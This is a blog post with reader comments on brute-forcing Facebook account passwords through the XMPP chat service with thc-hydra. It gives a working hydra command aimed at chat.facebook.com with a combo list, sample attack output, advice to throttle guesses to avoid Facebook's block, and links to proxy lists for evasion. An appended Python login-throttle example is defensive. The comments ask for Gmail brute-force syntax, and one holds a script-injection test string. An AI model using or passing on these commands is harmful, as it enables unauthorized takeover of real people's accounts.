Jul 19 2012

Just a short reminder that you can easily brute-force Facebook accounts using the chat interface (XMPP) and thc-hydra (a very fast brute-force tool that also supports wordlists).

XMPP support was added in version 7.x, so be sure to have the latest version. (It compiles for XMPP out of the box, so even if you don’t have all the libraries for SSH/MySQL/… it might work.)

Here is an example of the command line:

hydra -C /tmp/username_pw_combo_list.txt -s 5222 -f -V -S chat.facebook.com xmpp

That’s it, but be careful to throttle your attacks. After some wrong logins Facebook will block you from using XMPP. It will look like this in hydra:

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-xx xx:xx:xx
[DATA] 1 task, 1 server, 994 login tries, ~994 tries per task
[DATA] attacking service xmpp on port 5222
[ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[RE-ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[RE-ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[ERROR] Too many connect errors to target, disabling xmpp://chat.facebook.com:5222
0 of 1 target successfuly completed, 0 valid passwords found
[ERROR] 1 target did not resolve or could not be connected
Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-xx xx:xx:xx

This guy tweets a list of proxies if you need some ;)
Examples: http://pastebin.com/raw.php?i=EXUYq9Hh, http://pastebin.com/raw.php?i=BjbqBxJT, http://pastebin.com/raw.php?i=tkT45MBE
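
The block Facebook applies after some wrong logins is a server-side control. As an added example (not code from this post, from Facebook or from hydra), the following shows a failure counter that is shared by every login interface and keyed on both the account and the source address, so that guesses against one account from many addresses and guesses against many accounts from one address are both caught. The thresholds, the class and function names and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

WINDOW_S = 300        # assumed sliding window, seconds
MAX_ACCT_FAILS = 5    # assumed failures per account before it is locked
MAX_SRC_ACCTS = 3     # assumed distinct failed accounts per source before a block
LOCK_S = 900          # assumed lock/block duration, seconds

class LoginThrottle:
    """One failure counter shared by every auth front end (web, xmpp, ...)."""

    def __init__(self):
        self.acct_fails = defaultdict(deque)  # account -> failure timestamps
        self.src_fails = defaultdict(deque)   # source -> (timestamp, account)
        self.blocked = {}                     # ("acct"|"src", key) -> expiry time

    def _is_blocked(self, kind, key, now):
        return now < self.blocked.get((kind, key), 0)

    def attempt(self, now, src, account, password_ok):
        """Return 'ok', 'fail' or 'blocked' for one login attempt."""
        # Refuse before the password result is used, so a blocked client
        # learns nothing about whether its guess was right.
        if self._is_blocked("acct", account, now) or self._is_blocked("src", src, now):
            return "blocked"
        if password_ok:
            self.acct_fails.pop(account, None)
            return "ok"
        aq, sq = self.acct_fails[account], self.src_fails[src]
        aq.append(now)
        sq.append((now, account))
        while aq and aq[0] <= now - WINDOW_S:
            aq.popleft()
        while sq and sq[0][0] <= now - WINDOW_S:
            sq.popleft()
        if len(aq) >= MAX_ACCT_FAILS:                 # many guesses, one account
            self.blocked[("acct", account)] = now + LOCK_S
        if len({a for _, a in sq}) >= MAX_SRC_ACCTS:  # one source, many accounts
            self.blocked[("src", src)] = now + LOCK_S
        return "fail"

# Constructed sample events: (time, interface, source, account, password_ok)
EVENTS = [(t, "xmpp" if t % 2 else "web", f"198.51.100.{t}", "a@b.com", False)
          for t in range(1, 7)]
EVENTS += [(10 + i, "xmpp", "203.0.113.9", f"user{i}@b.com", False) for i in range(4)]
EVENTS.append((20, "web", "192.0.2.1", "a@b.com", True))  # right password, locked account

def replay(events):
    # The interface field is deliberately ignored: web and XMPP share one budget.
    t = LoginThrottle()
    return [t.attempt(now, src, acct, ok) for now, _iface, src, acct, ok in events]
```

The last sample event shows the cost of a hard per-account lock: the legitimate owner is refused as well until the lock expires, which is why deployments often pair it with a secondary challenge rather than a flat denial.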

  7 Responses to “Hacking Facebook Accounts using thc-hydra (XMPP)”

  1. Can you please share the actual command syntax for facebook account.
    For example I am running hydra -S -l xxxxx@gmail.com -x 6:8:al -w 32 -e ns -V -s 465 smtp-gmail.com smtp for gmail account.

  2. Ok, if I'm looking to use a wordlist for a username I already know, what would that look like?

  3. Can you tell the full method with correct codes, because the password is not showing, it is coming in question marks.

  4. Interesting idea to avoid the security associated with the web login panel. Great!

  5. alert(“Hello”);
